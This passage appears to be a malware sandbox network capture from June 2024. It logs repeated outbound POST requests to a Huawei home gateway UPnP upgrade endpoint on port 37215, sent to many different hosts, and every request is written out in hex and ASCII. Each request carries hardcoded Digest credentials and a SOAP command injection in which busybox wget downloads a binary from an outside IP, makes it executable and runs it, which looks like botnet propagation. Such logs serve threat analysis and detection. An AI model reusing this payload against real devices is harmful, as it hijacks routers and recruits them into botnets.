                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1390192.168.2.1559002197.174.169.1937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732039928 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1391192.168.2.1541226197.68.52.17137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732040882 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1392192.168.2.1538982197.72.45.19937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732064009 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1393192.168.2.1538354197.132.154.7437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732095003 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1394192.168.2.1544220197.59.187.21837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732119083 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1395192.168.2.1545468197.58.2.22737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732119083 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1396192.168.2.1541050197.202.79.2437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732160091 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1397192.168.2.1554892197.155.128.6537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732172012 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1398192.168.2.1557922197.254.79.11937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732192993 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1399192.168.2.1534326197.171.253.20637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.732198000 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
